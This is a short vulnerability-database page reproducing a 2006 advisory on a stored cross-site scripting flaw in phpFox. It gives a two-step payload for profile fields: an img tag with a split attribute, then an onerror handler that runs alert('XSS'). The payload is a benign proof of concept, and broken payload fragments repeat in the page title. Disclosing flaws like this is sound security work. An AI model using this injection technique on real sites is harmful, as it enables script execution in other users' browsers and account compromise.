View your profile and watch the magic of XSS!">phpFox XSS Injection - vulnerability database | Vulners.com View your profile and watch the magic of XSS!"> View your profile and watch the magic of XSS!"> View your profile and watch the magic of XSS!">
Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14948
HistoryNov 07, 2006 - 12:00 a.m.

phpFox XSS Injection

2006-11-0700:00:00
vulners.com
36

#Exploit found by Maximize

–> jjj.zkpber.pbz <–


Step1: When editing your profile, in the about me section put the following
code
<img src="http://xss.xss/xss.jpg&quot; z='

Step2: In the field under the About me section put the following:

'onerror="alert('XSS');" />

View your profile and watch the magic of XSS!